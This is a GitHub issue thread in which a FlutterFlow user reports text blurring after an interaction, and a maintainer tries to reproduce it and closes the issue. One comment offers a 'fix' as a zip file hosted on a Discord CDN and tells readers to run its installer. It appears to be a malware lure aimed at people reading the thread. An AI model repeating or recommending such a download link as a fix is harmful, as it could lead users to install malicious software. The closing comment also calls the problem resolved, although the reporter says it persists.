### ISSUE TITLE
text seem blurred after some action

### ISSUE THREAD

**Issue by coach1990** [FlutterFlow/flutterflow-issues#3731]
### Can we access your project?

- [X] I give permission for members of the FlutterFlow team to access and test my project for the sole purpose of investigating this issue.

### Current Behavior

text quality or other properties change after some interaction or action on it

### Expected Behavior

text quality or other properties shouldnt change after some interaction or action on it

### Steps to Reproduce

please access my project and click on 'Health' tag , since i have applied interactivity on this container only at the only

### Reproducible from Blank

- [ ] The steps to reproduce above start from a blank project.

### Bug Report Code (Required)

IT4sjPHq2ItOodhE7rXyccd7/WYXC217beYescp/bxIgGIDzPOw+ZPXsbRBtXsviTWNMMUSmmkcF/9bTi9+eVMBfNk+cY4R7yLhqVAndeHyVe5OBDqiOdEdBM9tUC2GM5pjZkxZ5HLFucl4s7U6yG+/KUXTrHu/AIndISq/LZO4=

### Visual documentation

https://github.com/user-attachments/assets/2f94cefc-f458-4924-967a-754cb1f620e1

### Environment

```markdown
- FlutterFlow version: FlutterFlow v4.1.85+ released August 27, 2024 Flutter version is 3.22.2
- Platform: Desktop App Windows
- Browser name and version: Microsoft Edge Version 127.0.2651.74 (Official build) (64-bit)
- Operating system and version affected: Windows 11 Home Single Language , 23H2

Project: letMeDraw
Project ID: let-me-draw-zo88ww
```

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Alezanello** [comment]
Hi there!

I wasn't able to create a user in your project to test it directly, so I navigated to the `/HomePage` and started interacting with the Tags. Since I don’t have a user, I didn’t see the green color as shown in your video. Instead, the tags just went blank and then reappeared after clicking, but the text quality remained unchanged, as you can see in the following GIF.

This could potentially be an issue with how your browser is rendering the page.

<img src="https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/89fa2094-e701-4831-9823-98187b75ed3b/b2f3604c-49ce-4e00-af76-7bdabeb44176?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS84OWZhMjA5NC1lNzAxLTQ4MzEtOTgyMy05ODE4N2I3NWVkM2IvYjJmMzYwNGMtNDljZS00ZTAwLWFmNzYtN2JkYWJlYjQ0MTc2IiwiaWF0IjoxNzI1MzY3NDA3LCJleHAiOjMzMjk1OTI3NDA3fQ.ZWLCuzK2MKNG3D6WnuqqldDOLsXuKBxJtnmZfNBVCKM " alt="notChanges.gif" width="1356" height="498" />

**Comment by coach1990** [comment]
Hi @Alezanello actually i have changed UI because it was not working(blurred), but the problem exists.

**Comment by Alezanello** [comment]
Hello,<br><br>I apologize for the late response. Does this issue still persist, or was it fixed in the latest FlutterFlow updates?

**Comment by coach1990** [comment]
@Alezanello late response is all okay.
I actually changed my design but last time I checked , yes it was still there.

**Comment by Alezanello** [comment]
I’m glad everything is working as expected now! I’ll go ahead and close this issue, but if you encounter anything else, please don’t hesitate to open a new one!
